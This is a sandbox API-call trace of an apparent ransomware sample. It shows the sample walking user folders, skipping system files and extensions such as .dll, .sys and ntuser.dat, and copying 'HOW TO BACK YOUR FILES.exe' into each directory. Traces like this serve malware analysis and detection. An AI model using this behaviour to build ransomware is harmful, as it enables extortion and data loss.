(lpString1="Orange Circles.htm", lpString2=".lnk") returned 1 [0041.861] lstrlenW (lpString=".ini") returned 4 [0041.861] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".ini") returned 1 [0041.861] lstrlenW (lpString=".sys") returned 4 [0041.861] lstrcmpiW (lpString1="Orange Circles.htm", lpString2=".sys") returned 1 [0041.861] lstrlenW (lpString="Orange Circles.htm") returned 18 [0041.862] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="OrangeCircles.jpg" | out: lpString1="OrangeCircles.jpg") returned="OrangeCircles.jpg" [0041.862] lstrlenW (lpString="OrangeCircles.jpg") returned 17 [0041.862] lstrlenW (lpString="Ares865") returned 7 [0041.862] lstrcmpiW (lpString1="les.jpg", lpString2="Ares865") returned 1 [0041.862] lstrlenW (lpString=".dll") returned 4 [0041.862] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".dll") returned 1 [0041.862] lstrlenW (lpString=".lnk") returned 4 [0041.862] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".lnk") returned 1 [0041.862] lstrlenW (lpString=".ini") returned 4 [0041.862] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".ini") returned 1 [0041.862] lstrlenW (lpString=".sys") returned 4 [0041.862] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".sys") returned 1 [0041.862] lstrlenW (lpString="OrangeCircles.jpg") returned 17 [0041.862] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Peacock.htm" | out: lpString1="Peacock.htm") returned="Peacock.htm" [0041.862] lstrlenW (lpString="Peacock.htm") returned 11 [0041.862] lstrlenW (lpString="Ares865") returned 7 [0041.862] lstrcmpiW (lpString1="ock.htm", lpString2="Ares865") returned 1 [0041.862] lstrlenW (lpString=".dll") returned 4 [0041.862] lstrcmpiW (lpString1="Peacock.htm", lpString2=".dll") returned 1 [0041.862] lstrlenW (lpString=".lnk") returned 4 [0041.862] lstrcmpiW (lpString1="Peacock.htm", lpString2=".lnk") returned 1 [0041.862] lstrlenW (lpString=".ini") returned 4 [0041.862] lstrcmpiW (lpString1="Peacock.htm", lpString2=".ini") returned 1 [0041.862] lstrlenW (lpString=".sys") returned 4 [0041.862] lstrcmpiW (lpString1="Peacock.htm", lpString2=".sys") returned 1 [0041.862] lstrlenW (lpString="Peacock.htm") returned 11 [0041.862] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Peacock.jpg" | out: lpString1="Peacock.jpg") returned="Peacock.jpg" [0041.862] lstrlenW (lpString="Peacock.jpg") returned 11 [0041.862] lstrlenW (lpString="Ares865") returned 7 [0041.862] lstrcmpiW (lpString1="ock.jpg", lpString2="Ares865") returned 1 [0041.862] lstrlenW (lpString=".dll") returned 4 [0041.863] lstrcmpiW (lpString1="Peacock.jpg", lpString2=".dll") returned 1 [0041.863] lstrlenW (lpString=".lnk") returned 4 [0041.863] lstrcmpiW (lpString1="Peacock.jpg", lpString2=".lnk") returned 1 [0041.863] lstrlenW (lpString=".ini") returned 4 [0041.863] lstrcmpiW (lpString1="Peacock.jpg", lpString2=".ini") returned 1 [0041.863] lstrlenW (lpString=".sys") returned 4 [0041.863] lstrcmpiW (lpString1="Peacock.jpg", lpString2=".sys") returned 1 [0041.863] lstrlenW (lpString="Peacock.jpg") returned 11 [0041.863] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Roses.htm" | out: lpString1="Roses.htm") returned="Roses.htm" [0041.863] lstrlenW (lpString="Roses.htm") returned 9 [0041.863] lstrlenW (lpString="Ares865") returned 7 [0041.863] lstrcmpiW (lpString1="ses.htm", lpString2="Ares865") returned 1 [0041.863] lstrlenW (lpString=".dll") returned 4 [0041.863] lstrcmpiW (lpString1="Roses.htm", lpString2=".dll") returned 1 [0041.863] lstrlenW (lpString=".lnk") returned 4 [0041.863] lstrcmpiW (lpString1="Roses.htm", lpString2=".lnk") returned 1 [0041.863] lstrlenW (lpString=".ini") returned 4 [0041.863] lstrcmpiW (lpString1="Roses.htm", lpString2=".ini") returned 1 [0041.863] lstrlenW (lpString=".sys") returned 4 [0041.863] lstrcmpiW (lpString1="Roses.htm", lpString2=".sys") returned 1 [0041.863] lstrlenW (lpString="Roses.htm") returned 9 [0041.863] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Roses.jpg" | out: lpString1="Roses.jpg") returned="Roses.jpg" [0041.863] lstrlenW (lpString="Roses.jpg") returned 9 [0041.863] lstrlenW (lpString="Ares865") returned 7 [0041.863] lstrcmpiW (lpString1="ses.jpg", lpString2="Ares865") returned 1 [0041.863] lstrlenW (lpString=".dll") returned 4 [0041.863] lstrcmpiW (lpString1="Roses.jpg", lpString2=".dll") returned 1 [0041.863] lstrlenW (lpString=".lnk") returned 4 [0041.863] lstrcmpiW (lpString1="Roses.jpg", lpString2=".lnk") returned 1 [0041.863] lstrlenW (lpString=".ini") returned 4 [0041.863] lstrcmpiW (lpString1="Roses.jpg", lpString2=".ini") returned 1 [0041.863] lstrlenW (lpString=".sys") returned 4 [0041.864] lstrcmpiW (lpString1="Roses.jpg", lpString2=".sys") returned 1 [0041.864] lstrlenW (lpString="Roses.jpg") returned 9 [0041.864] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Shades of Blue.htm" | out: lpString1="Shades of Blue.htm") returned="Shades of Blue.htm" [0041.864] lstrlenW (lpString="Shades of Blue.htm") returned 18 [0041.864] lstrlenW (lpString="Ares865") returned 7 [0041.864] lstrcmpiW (lpString1="lue.htm", lpString2="Ares865") returned 1 [0041.864] lstrlenW (lpString=".dll") returned 4 [0041.864] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2=".dll") returned 1 [0041.864] lstrlenW (lpString=".lnk") returned 4 [0041.864] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2=".lnk") returned 1 [0041.864] lstrlenW (lpString=".ini") returned 4 [0041.864] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2=".ini") returned 1 [0041.864] lstrlenW (lpString=".sys") returned 4 [0041.864] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2=".sys") returned 1 [0041.864] lstrlenW (lpString="Shades of Blue.htm") returned 18 [0041.864] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="ShadesOfBlue.jpg" | out: lpString1="ShadesOfBlue.jpg") returned="ShadesOfBlue.jpg" [0041.864] lstrlenW (lpString="ShadesOfBlue.jpg") returned 16 [0041.864] lstrlenW (lpString="Ares865") returned 7 [0041.864] lstrcmpiW (lpString1="lue.jpg", lpString2="Ares865") returned 1 [0041.864] lstrlenW (lpString=".dll") returned 4 [0041.864] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2=".dll") returned 1 [0041.864] lstrlenW (lpString=".lnk") returned 4 [0041.864] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2=".lnk") returned 1 [0041.864] lstrlenW (lpString=".ini") returned 4 [0041.865] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2=".ini") returned 1 [0041.865] lstrlenW (lpString=".sys") returned 4 [0041.866] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2=".sys") returned 1 [0041.866] lstrlenW (lpString="ShadesOfBlue.jpg") returned 16 [0041.866] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Soft Blue.htm" | out: lpString1="Soft Blue.htm") returned="Soft Blue.htm" [0041.866] lstrlenW (lpString="Soft Blue.htm") returned 13 [0041.866] lstrlenW (lpString="Ares865") returned 7 [0041.866] lstrcmpiW (lpString1="lue.htm", lpString2="Ares865") returned 1 [0041.866] lstrlenW (lpString=".dll") returned 4 [0041.866] lstrcmpiW (lpString1="Soft Blue.htm", lpString2=".dll") returned 1 [0041.866] lstrlenW (lpString=".lnk") returned 4 [0041.866] lstrcmpiW (lpString1="Soft Blue.htm", lpString2=".lnk") returned 1 [0041.866] lstrlenW (lpString=".ini") returned 4 [0041.866] lstrcmpiW (lpString1="Soft Blue.htm", lpString2=".ini") returned 1 [0041.866] lstrlenW (lpString=".sys") returned 4 [0041.866] lstrcmpiW (lpString1="Soft Blue.htm", lpString2=".sys") returned 1 [0041.867] lstrlenW (lpString="Soft Blue.htm") returned 13 [0041.867] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="SoftBlue.jpg" | out: lpString1="SoftBlue.jpg") returned="SoftBlue.jpg" [0041.867] lstrlenW (lpString="SoftBlue.jpg") returned 12 [0041.867] lstrlenW (lpString="Ares865") returned 7 [0041.867] lstrcmpiW (lpString1="lue.jpg", lpString2="Ares865") returned 1 [0041.867] lstrlenW (lpString=".dll") returned 4 [0041.867] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2=".dll") returned 1 [0041.867] lstrlenW (lpString=".lnk") returned 4 [0041.867] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2=".lnk") returned 1 [0041.867] lstrlenW (lpString=".ini") returned 4 [0041.867] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2=".ini") returned 1 [0041.867] lstrlenW (lpString=".sys") returned 4 [0041.867] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2=".sys") returned 1 [0041.867] lstrlenW (lpString="SoftBlue.jpg") returned 12 [0041.867] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Stars.htm" | out: lpString1="Stars.htm") returned="Stars.htm" [0041.867] lstrlenW (lpString="Stars.htm") returned 9 [0041.867] lstrlenW (lpString="Ares865") returned 7 [0041.867] lstrcmpiW (lpString1="ars.htm", lpString2="Ares865") returned 1 [0041.868] lstrlenW (lpString=".dll") returned 4 [0041.868] lstrcmpiW (lpString1="Stars.htm", lpString2=".dll") returned 1 [0041.868] lstrlenW (lpString=".lnk") returned 4 [0041.868] lstrcmpiW (lpString1="Stars.htm", lpString2=".lnk") returned 1 [0041.868] lstrlenW (lpString=".ini") returned 4 [0041.868] lstrcmpiW (lpString1="Stars.htm", lpString2=".ini") returned 1 [0041.868] lstrlenW (lpString=".sys") returned 4 [0041.868] lstrcmpiW (lpString1="Stars.htm", lpString2=".sys") returned 1 [0041.868] lstrlenW (lpString="Stars.htm") returned 9 [0041.868] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="Stars.jpg" | out: lpString1="Stars.jpg") returned="Stars.jpg" [0041.868] lstrlenW (lpString="Stars.jpg") returned 9 [0041.868] lstrlenW (lpString="Ares865") returned 7 [0041.868] lstrcmpiW (lpString1="ars.jpg", lpString2="Ares865") returned 1 [0041.868] lstrlenW (lpString=".dll") returned 4 [0041.868] lstrcmpiW (lpString1="Stars.jpg", lpString2=".dll") returned 1 [0041.868] lstrlenW (lpString=".lnk") returned 4 [0041.868] lstrcmpiW (lpString1="Stars.jpg", lpString2=".lnk") returned 1 [0041.868] lstrlenW (lpString=".ini") returned 4 [0041.868] lstrcmpiW (lpString1="Stars.jpg", lpString2=".ini") returned 1 [0041.868] lstrlenW (lpString=".sys") returned 4 [0041.868] lstrcmpiW (lpString1="Stars.jpg", lpString2=".sys") returned 1 [0041.868] lstrlenW (lpString="Stars.jpg") returned 9 [0041.868] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup" [0041.868] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0041.868] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0041.868] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup") returned 66 [0041.868] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup" [0041.868] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.869] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.881] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.881] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0041.882] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.882] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.882] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.882] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.882] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.882] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.882] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.882] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.882] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a89a8c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.882] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.882] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66b2700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2f7a14e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="new", cAlternateFileName="")) returned 1 [0041.882] lstrcmpiW (lpString1="new", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.882] lstrcmpiW (lpString1="new", lpString2="aoldtz.exe") returned 1 [0041.882] lstrcmpiW (lpString1="new", lpString2=".") returned 1 [0041.882] lstrcmpiW (lpString1="new", lpString2="..") returned 1 [0041.882] lstrcmpiW (lpString1="new", lpString2="windows") returned -1 [0041.882] lstrcmpiW (lpString1="new", lpString2="bootmgr") returned 1 [0041.882] lstrcmpiW (lpString1="new", lpString2="temp") returned -1 [0041.882] lstrcmpiW (lpString1="new", lpString2="pagefile.sys") returned -1 [0041.882] lstrcmpiW (lpString1="new", lpString2="boot") returned 1 [0041.882] lstrcmpiW (lpString1="new", lpString2="ids.txt") returned 1 [0041.882] lstrcmpiW (lpString1="new", lpString2="ntuser.dat") returned -1 [0041.882] lstrcmpiW (lpString1="new", lpString2="perflogs") returned -1 [0041.882] lstrcmpiW (lpString1="new", lpString2="MSBuild") returned 1 [0041.882] lstrlenW (lpString="new") returned 3 [0041.882] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\*") returned 68 [0041.882] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="new" | out: lpString1="new") returned="new" [0041.882] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0041.882] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x2d1ea0 [0041.883] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0041.883] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66b2700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2f7a14e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="new", cAlternateFileName="")) returned 0 [0041.883] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0041.883] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2428 [0041.883] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new" [0041.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0041.883] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0041.883] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new") returned 70 [0041.883] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new" [0041.883] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.883] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.906] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.906] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0041.907] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.907] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.907] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.907] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8e6b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8e6b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.907] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.907] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.907] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.907] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.907] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x650f7e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x650f7e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2f2de8d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2="aoldtz.exe") returned 1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2=".") returned 1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2="..") returned 1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2="windows") returned -1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2="bootmgr") returned 1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2="temp") returned -1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2="pagefile.sys") returned -1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2="boot") returned 1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2="ids.txt") returned -1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2="ntuser.dat") returned -1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2="perflogs") returned -1 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2="MSBuild") returned -1 [0041.907] lstrlenW (lpString="edb00001.log") returned 12 [0041.907] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\*") returned 72 [0041.907] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="edb00001.log" | out: lpString1="edb00001.log") returned="edb00001.log" [0041.907] lstrlenW (lpString="edb00001.log") returned 12 [0041.907] lstrlenW (lpString="Ares865") returned 7 [0041.907] lstrcmpiW (lpString1="001.log", lpString2="Ares865") returned -1 [0041.907] lstrlenW (lpString=".dll") returned 4 [0041.907] lstrcmpiW (lpString1="edb00001.log", lpString2=".dll") returned 1 [0041.908] lstrlenW (lpString=".lnk") returned 4 [0041.908] lstrcmpiW (lpString1="edb00001.log", lpString2=".lnk") returned 1 [0041.908] lstrlenW (lpString=".ini") returned 4 [0041.908] lstrcmpiW (lpString1="edb00001.log", lpString2=".ini") returned 1 [0041.908] lstrlenW (lpString=".sys") returned 4 [0041.908] lstrcmpiW (lpString1="edb00001.log", lpString2=".sys") returned 1 [0041.908] lstrlenW (lpString="edb00001.log") returned 12 [0041.908] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="WindowsMail.MSMessageStore" | out: lpString1="WindowsMail.MSMessageStore") returned="WindowsMail.MSMessageStore" [0041.908] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0041.908] lstrlenW (lpString="Ares865") returned 7 [0041.908] lstrcmpiW (lpString1="geStore", lpString2="Ares865") returned 1 [0041.908] lstrlenW (lpString=".dll") returned 4 [0041.908] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".dll") returned 1 [0041.908] lstrlenW (lpString=".lnk") returned 4 [0041.908] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".lnk") returned 1 [0041.908] lstrlenW (lpString=".ini") returned 4 [0041.908] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".ini") returned 1 [0041.908] lstrlenW (lpString=".sys") returned 4 [0041.908] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".sys") returned 1 [0041.908] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0041.908] lstrcpyW (in: lpString1=0x2e2e8ee, lpString2="WindowsMail.pat" | out: lpString1="WindowsMail.pat") returned="WindowsMail.pat" [0041.908] lstrlenW (lpString="WindowsMail.pat") returned 15 [0041.908] lstrlenW (lpString="Ares865") returned 7 [0041.908] lstrcmpiW (lpString1="ail.pat", lpString2="Ares865") returned -1 [0041.908] lstrlenW (lpString=".dll") returned 4 [0041.908] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".dll") returned 1 [0041.908] lstrlenW (lpString=".lnk") returned 4 [0041.908] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".lnk") returned 1 [0041.908] lstrlenW (lpString=".ini") returned 4 [0041.909] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".ini") returned 1 [0041.909] lstrlenW (lpString=".sys") returned 4 [0041.909] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".sys") returned 1 [0041.909] lstrlenW (lpString="WindowsMail.pat") returned 15 [0041.909] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player" [0041.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0041.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0041.909] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player") returned 59 [0041.909] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player" [0041.909] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.909] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.915] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.915] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a90cce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a90cce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0041.915] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.915] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 